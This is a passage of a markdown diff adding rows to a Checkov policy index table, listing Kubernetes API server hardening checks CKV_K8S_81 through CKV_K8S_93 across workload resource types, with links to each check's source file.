used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3085 | CKV_K8S_81 | resource | ReplicationController | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes 
| [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3086 | CKV_K8S_81 | resource | StatefulSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3087 | CKV_K8S_82 | resource | CronJob | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3088 | CKV_K8S_82 | resource | DaemonSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3089 | CKV_K8S_82 | resource | Deployment | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3090 | CKV_K8S_82 | resource | DeploymentConfig | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3091 | CKV_K8S_82 | resource | Job | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3092 | CKV_K8S_82 | resource | Pod | Ensure that the admission control 
plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3093 | CKV_K8S_82 | resource | PodTemplate | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3094 | CKV_K8S_82 | resource | ReplicaSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3095 | CKV_K8S_82 | resource | ReplicationController | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3096 | CKV_K8S_82 | resource | StatefulSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | +| 3097 | CKV_K8S_83 | resource | CronJob | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3098 | CKV_K8S_83 | resource | DaemonSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3099 | CKV_K8S_83 | resource | Deployment | 
Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3100 | CKV_K8S_83 | resource | DeploymentConfig | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3101 | CKV_K8S_83 | resource | Job | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3102 | CKV_K8S_83 | resource | Pod | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3103 | CKV_K8S_83 | resource | PodTemplate | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3104 | CKV_K8S_83 | resource | ReplicaSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3105 | CKV_K8S_83 | resource | ReplicationController | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | 
[ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3106 | CKV_K8S_83 | resource | StatefulSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | +| 3107 | CKV_K8S_84 | resource | CronJob | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3108 | CKV_K8S_84 | resource | DaemonSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3109 | CKV_K8S_84 | resource | Deployment | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3110 | CKV_K8S_84 | resource | DeploymentConfig | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3111 | CKV_K8S_84 | resource | Job | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3112 | CKV_K8S_84 | resource | Pod | Ensure that the admission 
control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3113 | CKV_K8S_84 | resource | PodTemplate | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3114 | CKV_K8S_84 | resource | ReplicaSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3115 | CKV_K8S_84 | resource | ReplicationController | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3116 | CKV_K8S_84 | resource | StatefulSet | Ensure that the admission control plugin PodSecurityPolicy is set | Kubernetes | [ApiServerPodSecurityPolicyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerPodSecurityPolicyPlugin.py) | +| 3117 | CKV_K8S_85 | resource | CronJob | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3118 | CKV_K8S_85 | resource | DaemonSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3119 | 
CKV_K8S_85 | resource | Deployment | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3120 | CKV_K8S_85 | resource | DeploymentConfig | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3121 | CKV_K8S_85 | resource | Job | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3122 | CKV_K8S_85 | resource | Pod | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3123 | CKV_K8S_85 | resource | PodTemplate | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3124 | CKV_K8S_85 | resource | ReplicaSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3125 | CKV_K8S_85 | resource | ReplicationController | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | 
[ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3126 | CKV_K8S_85 | resource | StatefulSet | Ensure that the admission control plugin NodeRestriction is set | Kubernetes | [ApiServerNodeRestrictionPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNodeRestrictionPlugin.py) | +| 3127 | CKV_K8S_86 | resource | CronJob | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3128 | CKV_K8S_86 | resource | DaemonSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3129 | CKV_K8S_86 | resource | Deployment | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3130 | CKV_K8S_86 | resource | DeploymentConfig | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3131 | CKV_K8S_86 | resource | Job | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3132 | CKV_K8S_86 | resource | Pod | Ensure that the --insecure-bind-address argument is not set | Kubernetes | 
[ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3133 | CKV_K8S_86 | resource | PodTemplate | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3134 | CKV_K8S_86 | resource | ReplicaSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3135 | CKV_K8S_86 | resource | ReplicationController | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3136 | CKV_K8S_86 | resource | StatefulSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3137 | CKV_K8S_88 | resource | CronJob | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3138 | CKV_K8S_88 | resource | DaemonSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3139 | CKV_K8S_88 | resource | Deployment | Ensure that the --insecure-port argument is set to 0 | Kubernetes | 
[ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3140 | CKV_K8S_88 | resource | DeploymentConfig | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3141 | CKV_K8S_88 | resource | Job | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3142 | CKV_K8S_88 | resource | Pod | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3143 | CKV_K8S_88 | resource | PodTemplate | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3144 | CKV_K8S_88 | resource | ReplicaSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3145 | CKV_K8S_88 | resource | ReplicationController | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3146 | CKV_K8S_88 | resource | StatefulSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3147 | CKV_K8S_89 | resource | 
CronJob | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3148 | CKV_K8S_89 | resource | DaemonSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3149 | CKV_K8S_89 | resource | Deployment | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3150 | CKV_K8S_89 | resource | DeploymentConfig | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3151 | CKV_K8S_89 | resource | Job | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3152 | CKV_K8S_89 | resource | Pod | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3153 | CKV_K8S_89 | resource | PodTemplate | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3154 | CKV_K8S_89 | resource | ReplicaSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | 
[ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3155 | CKV_K8S_89 | resource | ReplicationController | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3156 | CKV_K8S_89 | resource | StatefulSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3157 | CKV_K8S_90 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3158 | CKV_K8S_90 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3159 | CKV_K8S_90 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3160 | CKV_K8S_90 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3161 | CKV_K8S_90 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3162 | CKV_K8S_90 | resource | Pod | Ensure that the --profiling 
argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3163 | CKV_K8S_90 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3164 | CKV_K8S_90 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3165 | CKV_K8S_90 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3166 | CKV_K8S_90 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3167 | CKV_K8S_91 | resource | CronJob | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3168 | CKV_K8S_91 | resource | DaemonSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3169 | CKV_K8S_91 | resource | Deployment | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3170 | CKV_K8S_91 | resource | DeploymentConfig | Ensure 
that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3171 | CKV_K8S_91 | resource | Job | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3172 | CKV_K8S_91 | resource | Pod | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3173 | CKV_K8S_91 | resource | PodTemplate | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3174 | CKV_K8S_91 | resource | ReplicaSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3175 | CKV_K8S_91 | resource | ReplicationController | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3176 | CKV_K8S_91 | resource | StatefulSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3177 | CKV_K8S_92 | resource | CronJob | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3178 | CKV_K8S_92 | resource | DaemonSet 
| Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3179 | CKV_K8S_92 | resource | Deployment | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3180 | CKV_K8S_92 | resource | DeploymentConfig | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3181 | CKV_K8S_92 | resource | Job | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3182 | CKV_K8S_92 | resource | Pod | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3183 | CKV_K8S_92 | resource | PodTemplate | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3184 | CKV_K8S_92 | resource | ReplicaSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3185 | CKV_K8S_92 | resource | ReplicationController 
| Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3186 | CKV_K8S_92 | resource | StatefulSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3187 | CKV_K8S_93 | resource | CronJob | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3188 | CKV_K8S_93 | resource | DaemonSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3189 | CKV_K8S_93 | resource | Deployment | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3190 | CKV_K8S_93 | resource | DeploymentConfig | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3191 | CKV_K8S_93 | resource | Job | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3192 
